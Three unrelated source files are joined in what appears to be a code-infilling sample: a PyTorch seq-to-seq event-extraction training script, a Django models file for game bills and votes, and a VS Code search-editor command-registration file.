output = self.ent_out(hidden)
return output, (hidden, cell_state), attn_weights
# 690
class SeqToSeqModel(nn.Module):
def __init__(self):
super(SeqToSeqModel, self).__init__()
self.word_embeddings = WordEmbeddings(len(word_vocab), word_embed_dim, word_embed_matrix, drop_rate)
self.encoder = Encoder(enc_inp_size, int(enc_hidden_size/2), layers, True, drop_rate)
self.decoder = Decoder(dec_inp_size, dec_hidden_size, layers, drop_rate, max_trg_len)
def forward(self, src_words_seq, src_chars_seq, src_mask, trg_words_seq, trg_vocab_mask, adj, is_training=False):
src_word_embeds = self.word_embeddings(src_words_seq)
trg_word_embeds = self.word_embeddings(trg_words_seq)
batch_len = src_word_embeds.size()[0]
if is_training:
time_steps = trg_word_embeds.size()[1] - 1
else:
time_steps = max_trg_len
encoder_output = self.encoder(src_word_embeds, src_chars_seq, adj, is_training)
h0 = autograd.Variable(torch.FloatTensor(torch.zeros(batch_len, word_embed_dim)))
h0 = h0.cuda()
c0 = autograd.Variable(torch.FloatTensor(torch.zeros(batch_len, word_embed_dim)))
c0 = c0.cuda()
dec_hid = (h0, c0)
if is_training:
dec_inp = trg_word_embeds[:, 0, :]
dec_out, dec_hid, dec_attn = self.decoder(dec_inp, dec_hid, encoder_output, src_word_embeds,
src_mask, is_training)
dec_out = dec_out.view(-1, len(word_vocab))
dec_out = F.log_softmax(dec_out, dim=-1)
dec_out = dec_out.unsqueeze(1)
for t in range(1, time_steps):
dec_inp = trg_word_embeds[:, t, :]
cur_dec_out, dec_hid, dec_attn = self.decoder(dec_inp, dec_hid, encoder_output, src_word_embeds,
src_mask, is_training)
cur_dec_out = cur_dec_out.view(-1, len(word_vocab))
dec_out = torch.cat((dec_out, F.log_softmax(cur_dec_out, dim=-1).unsqueeze(1)), 1)
else:
dec_inp = trg_word_embeds[:, 0, :]
dec_out, dec_hid, dec_attn = self.decoder(dec_inp, dec_hid, encoder_output, src_word_embeds,
src_mask, is_training)
dec_out = dec_out.view(-1, len(word_vocab))
if copy_on:
dec_out.data.masked_fill_(trg_vocab_mask.data, -float('inf'))
dec_out = F.log_softmax(dec_out, dim=-1)
topv, topi = dec_out.topk(1)
dec_out_v, dec_out_i = dec_out.topk(1)
dec_attn_v, dec_attn_i = dec_attn.topk(1)
for t in range(1, time_steps):
dec_inp = self.word_embeddings(topi.squeeze().detach())
cur_dec_out, dec_hid, cur_dec_attn = self.decoder(dec_inp, dec_hid, encoder_output, src_word_embeds,
src_mask, is_training)
cur_dec_out = cur_dec_out.view(-1, len(word_vocab))
if copy_on:
cur_dec_out.data.masked_fill_(trg_vocab_mask.data, -float('inf'))
cur_dec_out = F.log_softmax(cur_dec_out, dim=-1)
topv, topi = cur_dec_out.topk(1)
cur_dec_out_v, cur_dec_out_i = cur_dec_out.topk(1)
dec_out_i = torch.cat((dec_out_i, cur_dec_out_i), 1)
cur_dec_attn_v, cur_dec_attn_i = cur_dec_attn.topk(1)
dec_attn_i = torch.cat((dec_attn_i, cur_dec_attn_i), 1)
if is_training:
dec_out = dec_out.view(-1, len(word_vocab))
return dec_out
else:
return dec_out_i, dec_attn_i
def predict(samples, model, model_id):
pred_batch_size = batch_size
batch_count = math.ceil(len(samples) / pred_batch_size)
move_last_batch = False
if len(samples) - batch_size * (batch_count - 1) == 1:
move_last_batch = True
batch_count -= 1
preds = list()
attns = list()
model.eval()
set_random_seeds(random_seed)
start_time = datetime.datetime.now()
for batch_idx in tqdm(range(0, batch_count)):
batch_start = batch_idx * pred_batch_size
batch_end = min(len(samples), batch_start + pred_batch_size)
if batch_idx == batch_count - 1 and move_last_batch:
batch_end = len(samples)
cur_batch = samples[batch_start:batch_end]
cur_samples_input = get_batch_data(cur_batch, False)
src_words_seq = torch.from_numpy(cur_samples_input['src_words'].astype('long'))
src_words_mask = torch.from_numpy(cur_samples_input['src_words_mask'].astype('uint8'))
trg_vocab_mask = torch.from_numpy(cur_samples_input['trg_vocab_mask'].astype('uint8'))
trg_words_seq = torch.from_numpy(cur_samples_input['trg_words'].astype('long'))
adj = torch.from_numpy(cur_samples_input['adj'].astype('float32'))
src_chars_seq = torch.from_numpy(cur_samples_input['src_chars'].astype('long'))
if torch.cuda.is_available():
src_words_seq = src_words_seq.cuda()
src_words_mask = src_words_mask.cuda()
trg_vocab_mask = trg_vocab_mask.cuda()
trg_words_seq = trg_words_seq.cuda()
adj = adj.cuda()
src_chars_seq = src_chars_seq.cuda()
src_words_seq = autograd.Variable(src_words_seq)
src_words_mask = autograd.Variable(src_words_mask)
trg_vocab_mask = autograd.Variable(trg_vocab_mask)
adj = autograd.Variable(adj)
src_chars_seq = autograd.Variable(src_chars_seq)
trg_words_seq = autograd.Variable(trg_words_seq)
with torch.no_grad():
outputs = model(src_words_seq, src_chars_seq, src_words_mask, trg_words_seq, trg_vocab_mask, adj,False)
preds += list(outputs[0].data.cpu().numpy())
attns += list(outputs[1].data.cpu().numpy())
model.zero_grad()
end_time = datetime.datetime.now()
custom_print('Prediction time:', end_time - start_time)
return preds, attns
def train_model(model_id, train_samples, dev_samples, best_model_file):
train_size = len(train_samples)
batch_count = int(math.ceil(train_size/batch_size))
move_last_batch = False
if len(train_samples) - batch_size * (batch_count - 1) == 1:
move_last_batch = True
batch_count -= 1
custom_print(batch_count)
# model = get_model(model_id)
model = SeqToSeqModel()
pytorch_total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
custom_print('Parameters size:', pytorch_total_params)
custom_print(model)
if torch.cuda.is_available():
model.cuda()
if n_gpu > 1:
model = torch.nn.DataParallel(model)
criterion = nn.NLLLoss(ignore_index=0)
optimizer = optim.Adam(model.parameters())
custom_print(optimizer)
best_dev_acc = -1.0
best_epoch_idx = -1
best_epoch_seed = -1
for epoch_idx in range(0, num_epoch):
model.train()
model.zero_grad()
custom_print('Epoch:', epoch_idx + 1)
cur_seed = random_seed + epoch_idx + 1
set_random_seeds(cur_seed)
cur_shuffled_train_data = shuffle_data(train_samples)
start_time = datetime.datetime.now()
train_loss_val = 0.0
for batch_idx in tqdm(range(0, batch_count)):
batch_start = batch_idx * batch_size
batch_end = min(len(cur_shuffled_train_data), batch_start + batch_size)
if batch_idx == batch_count - 1 and move_last_batch:
batch_end = len(cur_shuffled_train_data)
cur_batch = cur_shuffled_train_data[batch_start:batch_end]
cur_samples_input = get_batch_data(cur_batch, True)
# np arrays to tensors
src_words_seq = torch.from_numpy(cur_samples_input['src_words'].astype('long'))
src_words_mask = torch.from_numpy(cur_samples_input['src_words_mask'].astype('uint8'))
trg_vocab_mask = torch.from_numpy(cur_samples_input['trg_vocab_mask'].astype('uint8'))
trg_words_seq = torch.from_numpy(cur_samples_input['trg_words'].astype('long'))
adj = torch.from_numpy(cur_samples_input['adj'].astype('float32'))
src_chars_seq = torch.from_numpy(cur_samples_input['src_chars'].astype('long'))
target = torch.from_numpy(cur_samples_input['target'].astype('long'))
if torch.cuda.is_available():
src_words_seq = src_words_seq.cuda()
src_words_mask = src_words_mask.cuda()
trg_vocab_mask = trg_vocab_mask.cuda()
trg_words_seq = trg_words_seq.cuda()
adj = adj.cuda()
src_chars_seq = src_chars_seq.cuda()
target = target.cuda()
src_words_seq = autograd.Variable(src_words_seq)
src_words_mask = autograd.Variable(src_words_mask)
trg_vocab_mask = autograd.Variable(trg_vocab_mask)
trg_words_seq = autograd.Variable(trg_words_seq)
adj = autograd.Variable(adj)
src_chars_seq = autograd.Variable(src_chars_seq)
target = autograd.Variable(target)
outputs = model(src_words_seq, src_chars_seq, src_words_mask, trg_words_seq, trg_vocab_mask, adj, True)
target = target.view(-1, 1).squeeze()
loss = criterion(outputs, target)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), 10.0)
if (batch_idx + 1) % update_freq == 0:
optimizer.step()
model.zero_grad()
train_loss_val += loss.item()
train_loss_val /= batch_count
end_time = datetime.datetime.now()
custom_print('Training loss:', train_loss_val)
custom_print('Training time:', end_time - start_time)
custom_print('\nDev Results\n')
set_random_seeds(random_seed)
dev_preds, dev_attns = predict(dev_samples, model, model_id)
write_test_res(dev_samples, dev_preds, dev_attns, os.path.join(trg_data_folder, 'dev.out'))
ref_lines = open(trg_dev_file).read().splitlines()
pred_lines = open(os.path.join(trg_data_folder, 'dev.out')).read().splitlines()
event_lines = open(events_file).read().splitlines()
argument_lines = open(arguments_file).read().splitlines()
roles_lines = open(roles_file).read().splitlines()
dev_acc = calculate_f1(ref_lines, pred_lines, event_lines, argument_lines, roles_lines)
# pred_pos, gt_pos, correct_pos = get_F1(dev_samples, dev_preds, dev_attns)
# custom_print(pred_pos, '\t', gt_pos, '\t', correct_pos)
# p = float(correct_pos) / (pred_pos + 1e-8)
# r = float(correct_pos) / (gt_pos + 1e-8)
# dev_acc = (2 * p * r) / (p + r + 1e-8)
# custom_print('F1:', dev_acc)
if dev_acc >= best_dev_acc:
best_epoch_idx = epoch_idx + 1
best_epoch_seed = cur_seed
custom_print('model saved......')
best_dev_acc = dev_acc
torch.save(model.state_dict(), best_model_file)
custom_print('\n\n')
if epoch_idx + 1 - best_epoch_idx >= early_stop_cnt:
break
custom_print('*******')
custom_print('Best Epoch:', best_epoch_idx)
custom_print('Best Epoch Seed:', best_epoch_seed)
if __name__ == "__main__":
os.environ['CUDA_VISIBLE_DEVICES'] = sys.argv[1]
random_seed = int(sys.argv[2])
src_data_folder = sys.argv[3]
trg_data_folder = sys.argv[4]
job_mode = sys.argv[5]
embedding_type = sys.argv[6]
granular_mode = 1
n_gpu = torch.cuda.device_count()
set_random_seeds(random_seed)
if not os.path.exists(trg_data_folder):
os.mkdir(trg_data_folder)
model_name = 1
#Tunable Hyperparameters
batch_size = 32
num_epoch = 30
max_src_len = 100
max_trg_len = 50
if embedding_type == 'w2v':
embedding_file = os.path.join(src_data_folder, 'w2v.txt')
else:
embedding_file = os.path.join(src_data_folder, 'Bert_embeddings.txt')
update_freq = 1
enc_type = ['LSTM', 'GCN', 'LSTM-GCN'][0]
att_type = ['None', 'Unigram', 'N-Gram-Enc'][1]
copy_on = True
gcn_num_layers = 3
if embedding_type == 'w2v':
word_embed_dim = 300
else:
word_embed_dim = 768
word_min_freq = 2
char_embed_dim = 50
char_feature_size = 50
conv_filter_size = 3
max_word_len = 10
enc_inp_size = word_embed_dim + char_feature_size
enc_hidden_size = word_embed_dim
dec_inp_size = enc_hidden_size
dec_hidden_size = dec_inp_size
drop_rate = 0.3
layers = 1
early_stop_cnt = 20
sample_cnt = 0
Sample = recordclass("Sample", "Id SrcLen SrcWords TrgLen TrgWords")
events_file = os.path.join(src_data_folder, 'event_types.txt')
arguments_file = os.path.join(src_data_folder, 'arguments.txt')
roles_file = os.path.join(src_data_folder, 'roles.txt')
events = get_relations(events_file)
arguments = get_relations(arguments_file)
roles = get_relations(roles_file)
# train a model
if job_mode == 'train':
logger = open(os.path.join(trg_data_folder, 'training.log'), 'w')
custom_print(sys.argv)
custom_print(max_src_len, max_trg_len, drop_rate, layers)
custom_print('loading data......')
model_file_name = os.path.join(trg_data_folder, 'model.h5py')
src_train_file = os.path.join(src_data_folder, 'train.sent')
trg_train_file = os.path.join(src_data_folder, 'train.tup')
train_data = read_data(src_train_file, trg_train_file, 1)
src_dev_file = os.path.join(src_data_folder, 'dev.sent')
trg_dev_file = os.path.join(src_data_folder, 'dev.tup')
dev_data = read_data(src_dev_file, trg_dev_file, 2)
custom_print('Training data size:', len(train_data))
custom_print('Development data size:', len(dev_data))
custom_print("preparing vocabulary......")
save_vocab = os.path.join(trg_data_folder, 'vocab.pkl')
word_vocab, rev_word_vocab, char_vocab, word_embed_matrix = build_vocab(train_data, events, arguments, roles, save_vocab,
embedding_file)
custom_print("Training started......")
train_model(model_name, train_data, dev_data, model_file_name)
logger.close()
if job_mode == 'test':
logger = open(os.path.join(trg_data_folder, 'test.log'), 'w')
custom_print(sys.argv)
custom_print("loading word vectors......")
vocab_file_name = os.path.join(trg_data_folder, 'vocab.pkl')
word_vocab, char_vocab = load_vocab(vocab_file_name)
rev_word_vocab = OrderedDict()
for word in word_vocab:
idx = word_vocab[word]
rev_word_vocab[idx] = word
word_embed_matrix = np.zeros((len(word_vocab), word_embed_dim), dtype=np.float32)
custom_print('vocab size:', len(word_vocab))
src_test_file = os.path.join(src_data_folder, 'test.sent')
trg_test_file = os.path.join(src_data_folder, 'test.tup')
test_data = read_data(src_test_file, trg_test_file, 3)
custom_print('Test data size:', len(test_data))
custom_print('seed:', random_seed)
model_file = os.path.join(trg_data_folder, 'model.h5py')
best_model = get_model(model_name)
custom_print(best_model)
if torch.cuda.is_available():
best_model.cuda()
if n_gpu > 1:
best_model = torch.nn.DataParallel(best_model)
best_model.load_state_dict(torch.load(model_file))
custom_print('\nTest Results\n')
set_random_seeds(random_seed)
test_preds, test_attns = predict(test_data, best_model, model_name)
custom_print('Copy On')
write_test_res(test_data, test_preds, test_attns, os.path.join(trg_data_folder, 'test.out'))
# ref_lines = open(trg_test_file).readlines()
# pred_lines = open(os.path.join(trg_data_folder, 'test.out')).readlines()
# event_lines = open(events_file).readlines()
# argument_lines = open(arguments_file).readlines()
# roles_lines = open(roles_file).readlines()
ref_lines = open(trg_test_file).read().splitlines()
pred_lines = open(os.path.join(trg_data_folder, 'test.out')).read().splitlines()
event_lines = open(events_file).read().splitlines()
argument_lines = open(arguments_file).read().splitlines()
roles_lines = open(roles_file).read().splitlines()
mode = 1
custom_print('Overall F1')
# custom_print(cal_f1(ref_lines, pred_lines, event_lines, argument_lines, roles_lines, mode))
calculate_f1(ref_lines, pred_lines, event_lines, argument_lines, roles_lines)
copy_on = False
custom_print('Copy Off')
set_random_seeds(random_seed)
test_preds, test_attns = predict(test_data, best_model, model_name)
write_test_res(test_data, test_preds, test_attns, os.path.join(trg_data_folder, 'test_without_copy.out'))
# ref_lines = open(trg_test_file).readlines()
# pred_lines = open(os.path.join(trg_data_folder, 'test_without_copy.out')).readlines()
# event_lines = open(events_file).readlines()
# argument_lines = open(arguments_file).readlines()
# roles_lines = open(roles_file).readlines()
ref_lines = open(trg_test_file).read().splitlines()
pred_lines = open(os.path.join(trg_data_folder, 'test_without_copy.out')).read().splitlines()
event_lines = open(events_file).read().splitlines()
argument_lines = open(arguments_file).read().splitlines()
roles_lines = open(roles_file).read().splitlines()
mode = 1
custom_print('Overall F1')
# custom_print(cal_f1(ref_lines, pred_lines, event_lines, argument_lines, roles_lines, mode))
calculate_f1(ref_lines, pred_lines, event_lines, argument_lines, roles_lines)
logger.close()
| read_data |
models.py |
import smart_imports
smart_imports.all()
class Bill(django_models.Model):
CAPTION_MIN_LENGTH = 6
CAPTION_MAX_LENGTH = 256
created_at = django_models.DateTimeField(auto_now_add=True, null=False)
updated_at = django_models.DateTimeField(auto_now_add=True, null=False) # MUST setupped by hand
voting_end_at = django_models.DateTimeField(null=True, blank=True)
created_at_turn = django_models.IntegerField(null=False)
applyed_at_turn = django_models.IntegerField(null=True, blank=True)
ended_at = django_models.DateTimeField(null=True, blank=True)
owner = django_models.ForeignKey('accounts.Account', null=True, related_name='+', on_delete=django_models.SET_NULL)
caption = django_models.CharField(max_length=CAPTION_MAX_LENGTH)
type = rels_django.RelationIntegerField(relation=relations.BILL_TYPE, db_index=True)
state = rels_django.RelationIntegerField(relation=relations.BILL_STATE, db_index=True)
approved_by_moderator = django_models.BooleanField(default=False, db_index=True)
remove_initiator = django_models.ForeignKey('accounts.Account', null=True, blank=True, related_name='+', on_delete=django_models.SET_NULL)
technical_data = django_models.TextField(null=False, blank=True, default={})
chronicle_on_accepted = django_models.TextField(null=False, blank=True, default='')
# we should not remove bill when ocasionally remove forum thread
forum_thread = django_models.ForeignKey(forum_models.Thread, null=True, blank=True, related_name='+', on_delete=django_models.SET_NULL)
votes_for = django_models.IntegerField(default=0)
votes_against = django_models.IntegerField(default=0)
votes_refrained = django_models.IntegerField(default=0)
# fields to store config values after processing state (since they can be changed in future)
min_votes_percents_required = django_models.FloatField(default=0.0)
is_declined = django_models.BooleanField(blank=True, default=False)
declined_by = django_models.ForeignKey('bills.Bill', null=True, default=None, related_name='+', blank=True, on_delete=django_models.SET_NULL)
depends_on = django_models.ForeignKey('bills.Bill', null=True, default=None, related_name='+', blank=True, on_delete=django_models.SET_NULL)
def __str__(self):
|
class Meta:
permissions = (("moderate_bill", "Может администрировать записи в Книге Судеб"), )
class Actor(django_models.Model):
# ATTENTION: if you want to make building an actor, remember, that after it recreated
# (for same person after destroying previouse building)
# it first fully removed from base (previouse building) and only then created
created_at = django_models.DateTimeField(auto_now_add=True, null=False)
bill = django_models.ForeignKey(Bill, null=False, on_delete=django_models.CASCADE)
place = django_models.ForeignKey('places.Place', null=True, related_name='+', on_delete=django_models.CASCADE)
class Vote(django_models.Model):
created_at = django_models.DateTimeField(auto_now_add=True, null=False)
owner = django_models.ForeignKey('accounts.Account', null=True, related_name='+', on_delete=django_models.SET_NULL)
bill = django_models.ForeignKey(Bill, null=False, on_delete=django_models.CASCADE)
type = rels_django.RelationIntegerField(relation=relations.VOTE_TYPE, db_index=True)
class Meta:
unique_together = (('owner', 'bill'),)
| return '{}-{}'.format(self.id, self.caption) |
searchEditor.contribution.ts | /*---------------------------------------------------------------------------------------------
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See License.txt in the project root for license information.
*--------------------------------------------------------------------------------------------*/
import { KeyCode, KeyMod } from 'vs/base/common/keyCodes';
import * as objects from 'vs/base/common/objects';
import { extname } from 'vs/base/common/resources';
import { URI } from 'vs/base/common/uri';
import { ServicesAccessor } from 'vs/editor/browser/editorExtensions';
import { Range } from 'vs/editor/common/core/range';
import { ToggleCaseSensitiveKeybinding, ToggleRegexKeybinding, ToggleWholeWordKeybinding } from 'vs/editor/contrib/find/findModel';
import { localize } from 'vs/nls';
import { Action2, MenuId, registerAction2 } from 'vs/platform/actions/common/actions';
import { CommandsRegistry } from 'vs/platform/commands/common/commands';
import { ContextKeyExpr, IContextKeyService } from 'vs/platform/contextkey/common/contextkey';
import { SyncDescriptor } from 'vs/platform/instantiation/common/descriptors';
import { IInstantiationService } from 'vs/platform/instantiation/common/instantiation';
import { KeybindingsRegistry, KeybindingWeight } from 'vs/platform/keybinding/common/keybindingsRegistry';
import { LifecyclePhase } from 'vs/platform/lifecycle/common/lifecycle';
import { Registry } from 'vs/platform/registry/common/platform';
import { ITelemetryService } from 'vs/platform/telemetry/common/telemetry';
import { EditorDescriptor, Extensions as EditorExtensions, IEditorRegistry } from 'vs/workbench/browser/editor';
import { Extensions as WorkbenchExtensions, IWorkbenchContribution, IWorkbenchContributionsRegistry } from 'vs/workbench/common/contributions';
import { ActiveEditorContext, Extensions as EditorInputExtensions, IEditorInputFactory, IEditorInputFactoryRegistry } from 'vs/workbench/common/editor';
import { IViewsService } from 'vs/workbench/common/views';
import { getSearchView } from 'vs/workbench/contrib/search/browser/searchActions';
import { searchRefreshIcon } from 'vs/workbench/contrib/search/browser/searchIcons';
import * as SearchConstants from 'vs/workbench/contrib/search/common/constants';
import * as SearchEditorConstants from 'vs/workbench/contrib/searchEditor/browser/constants';
import { SearchEditor } from 'vs/workbench/contrib/searchEditor/browser/searchEditor';
import { createEditorFromSearchResult, modifySearchEditorContextLinesCommand, openNewSearchEditor, selectAllSearchEditorMatchesCommand, toggleSearchEditorCaseSensitiveCommand, toggleSearchEditorContextLinesCommand, toggleSearchEditorRegexCommand, toggleSearchEditorWholeWordCommand } from 'vs/workbench/contrib/searchEditor/browser/searchEditorActions';
import { getOrMakeSearchEditorInput, SearchConfiguration, SearchEditorInput, SEARCH_EDITOR_EXT } from 'vs/workbench/contrib/searchEditor/browser/searchEditorInput';
import { parseSavedSearchEditor } from 'vs/workbench/contrib/searchEditor/browser/searchEditorSerialization';
import { IEditorService } from 'vs/workbench/services/editor/common/editorService';
const OpenInEditorCommandId = 'search.action.openInEditor';
const OpenNewEditorToSideCommandId = 'search.action.openNewEditorToSide';
const FocusQueryEditorWidgetCommandId = 'search.action.focusQueryEditorWidget';
const ToggleSearchEditorCaseSensitiveCommandId = 'toggleSearchEditorCaseSensitive';
const ToggleSearchEditorWholeWordCommandId = 'toggleSearchEditorWholeWord';
const ToggleSearchEditorRegexCommandId = 'toggleSearchEditorRegex';
const ToggleSearchEditorContextLinesCommandId = 'toggleSearchEditorContextLines';
const IncreaseSearchEditorContextLinesCommandId = 'increaseSearchEditorContextLines';
const DecreaseSearchEditorContextLinesCommandId = 'decreaseSearchEditorContextLines';
const RerunSearchEditorSearchCommandId = 'rerunSearchEditorSearch';
const CleanSearchEditorStateCommandId = 'cleanSearchEditorState';
const SelectAllSearchEditorMatchesCommandId = 'selectAllSearchEditorMatches';
//#region Editor Descriptior
Registry.as<IEditorRegistry>(EditorExtensions.Editors).registerEditor(
EditorDescriptor.create(
SearchEditor,
SearchEditor.ID,
localize('searchEditor', "Search Editor")
),
[
new SyncDescriptor(SearchEditorInput)
]
);
//#endregion
//#region Startup Contribution
class SearchEditorContribution implements IWorkbenchContribution {
constructor(
@IEditorService private readonly editorService: IEditorService,
@IInstantiationService protected readonly instantiationService: IInstantiationService,
@ITelemetryService protected readonly telemetryService: ITelemetryService,
@IContextKeyService protected readonly contextKeyService: IContextKeyService,
) {
this.editorService.overrideOpenEditor({
open: (editor, options, group) => {
const resource = editor.resource;
if (!resource) { return undefined; }
if (extname(resource) !== SEARCH_EDITOR_EXT) {
return undefined;
}
if (editor instanceof SearchEditorInput && group.isOpened(editor)) {
return undefined;
}
this.telemetryService.publicLog2('searchEditor/openSavedSearchEditor');
return {
override: (async () => {
const { config } = await instantiationService.invokeFunction(parseSavedSearchEditor, resource);
const input = instantiationService.invokeFunction(getOrMakeSearchEditorInput, { backingUri: resource, config });
return editorService.openEditor(input, { ...options, override: false }, group);
})()
};
}
});
}
}
const workbenchContributionsRegistry = Registry.as<IWorkbenchContributionsRegistry>(WorkbenchExtensions.Workbench);
workbenchContributionsRegistry.registerWorkbenchContribution(SearchEditorContribution, LifecyclePhase.Starting);
//#endregion
//#region Input Factory
type SerializedSearchEditor = { modelUri: string, dirty: boolean, config: SearchConfiguration, name: string, matchRanges: Range[], backingUri: string };
class SearchEditorInputFactory implements IEditorInputFactory {
canSerialize(input: SearchEditorInput) {
return !input.isDisposed();
}
serialize(input: SearchEditorInput) {
let modelUri = undefined;
if (input.modelUri.path || input.modelUri.fragment) {
modelUri = input.modelUri.toString();
}
if (!modelUri) { return undefined; }
const config = input.config;
const dirty = input.isDirty();
const matchRanges = input.getMatchRanges();
const backingUri = input.backingUri;
return JSON.stringify({ modelUri: modelUri.toString(), dirty, config, name: input.getName(), matchRanges, backingUri: backingUri?.toString() } as SerializedSearchEditor);
}
deserialize(instantiationService: IInstantiationService, serializedEditorInput: string): SearchEditorInput | undefined {
const { modelUri, dirty, config, matchRanges, backingUri } = JSON.parse(serializedEditorInput) as SerializedSearchEditor;
if (config && (config.query !== undefined) && (modelUri !== undefined)) {
const input = instantiationService.invokeFunction(getOrMakeSearchEditorInput, { config, modelUri: URI.parse(modelUri), backingUri: backingUri ? URI.parse(backingUri) : undefined });
input.setDirty(dirty);
input.setMatchRanges(matchRanges);
return input;
}
return undefined;
}
}
Registry.as<IEditorInputFactoryRegistry>(EditorInputExtensions.EditorInputFactories).registerEditorInputFactory(
SearchEditorInput.ID,
SearchEditorInputFactory);
//#endregion
//#region Commands
KeybindingsRegistry.registerCommandAndKeybindingRule(objects.assign({
id: ToggleSearchEditorCaseSensitiveCommandId,
weight: KeybindingWeight.WorkbenchContrib,
when: ContextKeyExpr.and(SearchEditorConstants.InSearchEditor, SearchConstants.SearchInputBoxFocusedKey),
handler: toggleSearchEditorCaseSensitiveCommand
}, ToggleCaseSensitiveKeybinding));
KeybindingsRegistry.registerCommandAndKeybindingRule(objects.assign({
id: ToggleSearchEditorWholeWordCommandId,
weight: KeybindingWeight.WorkbenchContrib,
when: ContextKeyExpr.and(SearchEditorConstants.InSearchEditor, SearchConstants.SearchInputBoxFocusedKey),
handler: toggleSearchEditorWholeWordCommand
}, ToggleWholeWordKeybinding));
KeybindingsRegistry.registerCommandAndKeybindingRule(objects.assign({ | weight: KeybindingWeight.WorkbenchContrib,
when: ContextKeyExpr.and(SearchEditorConstants.InSearchEditor, SearchConstants.SearchInputBoxFocusedKey),
handler: toggleSearchEditorRegexCommand
}, ToggleRegexKeybinding));
KeybindingsRegistry.registerCommandAndKeybindingRule({
id: ToggleSearchEditorContextLinesCommandId,
weight: KeybindingWeight.WorkbenchContrib,
when: ContextKeyExpr.and(SearchEditorConstants.InSearchEditor),
handler: toggleSearchEditorContextLinesCommand,
primary: KeyMod.Alt | KeyCode.KEY_L,
mac: { primary: KeyMod.CtrlCmd | KeyMod.Alt | KeyCode.KEY_L }
});
KeybindingsRegistry.registerCommandAndKeybindingRule({
id: IncreaseSearchEditorContextLinesCommandId,
weight: KeybindingWeight.WorkbenchContrib,
when: ContextKeyExpr.and(SearchEditorConstants.InSearchEditor),
handler: (accessor: ServicesAccessor) => modifySearchEditorContextLinesCommand(accessor, true),
primary: KeyMod.Alt | KeyCode.US_EQUAL
});
KeybindingsRegistry.registerCommandAndKeybindingRule({
id: DecreaseSearchEditorContextLinesCommandId,
weight: KeybindingWeight.WorkbenchContrib,
when: ContextKeyExpr.and(SearchEditorConstants.InSearchEditor),
handler: (accessor: ServicesAccessor) => modifySearchEditorContextLinesCommand(accessor, false),
primary: KeyMod.Alt | KeyCode.US_MINUS
});
KeybindingsRegistry.registerCommandAndKeybindingRule({
id: SelectAllSearchEditorMatchesCommandId,
weight: KeybindingWeight.WorkbenchContrib,
when: ContextKeyExpr.and(SearchEditorConstants.InSearchEditor),
primary: KeyMod.CtrlCmd | KeyMod.Shift | KeyCode.KEY_L,
handler: selectAllSearchEditorMatchesCommand
});
CommandsRegistry.registerCommand(
CleanSearchEditorStateCommandId,
(accessor: ServicesAccessor) => {
const activeEditorPane = accessor.get(IEditorService).activeEditorPane;
if (activeEditorPane instanceof SearchEditor) {
activeEditorPane.cleanState();
}
});
//#endregion
//#region Actions
const category = localize('search', "Search Editor");
export type OpenSearchEditorArgs = Partial<SearchConfiguration & { triggerSearch: boolean, focusResults: boolean }>;
const openArgDescription = {
description: 'Open a new search editor. Arguments passed can include variables like ${relativeFileDirname}.',
args: [{
name: 'Open new Search Editor args',
schema: {
properties: {
query: { type: 'string' },
includes: { type: 'string' },
excludes: { type: 'string' },
contextLines: { type: 'number' },
wholeWord: { type: 'boolean' },
caseSensitive: { type: 'boolean' },
regexp: { type: 'boolean' },
useIgnores: { type: 'boolean' },
showIncludesExcludes: { type: 'boolean' },
triggerSearch: { type: 'boolean' },
focusResults: { type: 'boolean' },
}
}
}]
} as const;
registerAction2(class extends Action2 {
constructor() {
super({
id: 'search.searchEditor.action.deleteFileResults',
title: localize('searchEditor.deleteResultBlock', "Delete File Results"),
keybinding: {
weight: KeybindingWeight.EditorContrib,
when: SearchEditorConstants.InSearchEditor,
primary: KeyMod.CtrlCmd | KeyMod.Shift | KeyCode.Backspace,
},
precondition: SearchEditorConstants.InSearchEditor,
category,
f1: true,
});
}
async run(accessor: ServicesAccessor) {
const contextService = accessor.get(IContextKeyService).getContext(document.activeElement);
if (contextService.getValue(SearchEditorConstants.InSearchEditor.serialize())) {
(accessor.get(IEditorService).activeEditorPane as SearchEditor).deleteResultBlock();
}
}
});
registerAction2(class extends Action2 {
constructor() {
super({
id: SearchEditorConstants.OpenNewEditorCommandId,
title: localize('search.openNewSearchEditor', "Open new Search Editor"),
category,
f1: true,
description: openArgDescription
});
}
async run(accessor: ServicesAccessor, args: OpenSearchEditorArgs) {
await accessor.get(IInstantiationService).invokeFunction(openNewSearchEditor, args);
}
});
registerAction2(class extends Action2 {
constructor() {
super({
id: OpenNewEditorToSideCommandId,
title: localize('search.openNewEditorToSide', "Open new Search Editor to the Side"),
category,
f1: true,
description: openArgDescription
});
}
async run(accessor: ServicesAccessor, args: OpenSearchEditorArgs) {
await accessor.get(IInstantiationService).invokeFunction(openNewSearchEditor, args, true);
}
});
registerAction2(class extends Action2 {
constructor() {
super({
id: OpenInEditorCommandId,
title: localize('search.openResultsInEditor', "Open Results in Editor"),
category,
f1: true,
keybinding: {
primary: KeyMod.Alt | KeyCode.Enter,
when: ContextKeyExpr.and(SearchConstants.HasSearchResults, SearchConstants.SearchViewFocusedKey),
weight: KeybindingWeight.WorkbenchContrib,
mac: {
primary: KeyMod.CtrlCmd | KeyCode.Enter
}
},
});
}
async run(accessor: ServicesAccessor) {
const viewsService = accessor.get(IViewsService);
const instantiationService = accessor.get(IInstantiationService);
const searchView = getSearchView(viewsService);
if (searchView) {
await instantiationService.invokeFunction(createEditorFromSearchResult, searchView.searchResult, searchView.searchIncludePattern.getValue(), searchView.searchExcludePattern.getValue());
}
}
});
registerAction2(class extends Action2 {
constructor() {
super({
id: RerunSearchEditorSearchCommandId,
title: localize('search.rerunSearchInEditor', "Search Again"),
category,
keybinding: {
primary: KeyMod.CtrlCmd | KeyMod.Shift | KeyCode.KEY_R,
when: SearchEditorConstants.InSearchEditor,
weight: KeybindingWeight.EditorContrib
},
icon: searchRefreshIcon,
menu: [{
id: MenuId.EditorTitle,
group: 'navigation',
when: ActiveEditorContext.isEqualTo(SearchEditorConstants.SearchEditorID)
},
{
id: MenuId.CommandPalette,
when: ActiveEditorContext.isEqualTo(SearchEditorConstants.SearchEditorID)
}]
});
}
async run(accessor: ServicesAccessor) {
const editorService = accessor.get(IEditorService);
const input = editorService.activeEditor;
if (input instanceof SearchEditorInput) {
(editorService.activeEditorPane as SearchEditor).triggerSearch({ resetCursor: false });
}
}
});
registerAction2(class extends Action2 {
constructor() {
super({
id: FocusQueryEditorWidgetCommandId,
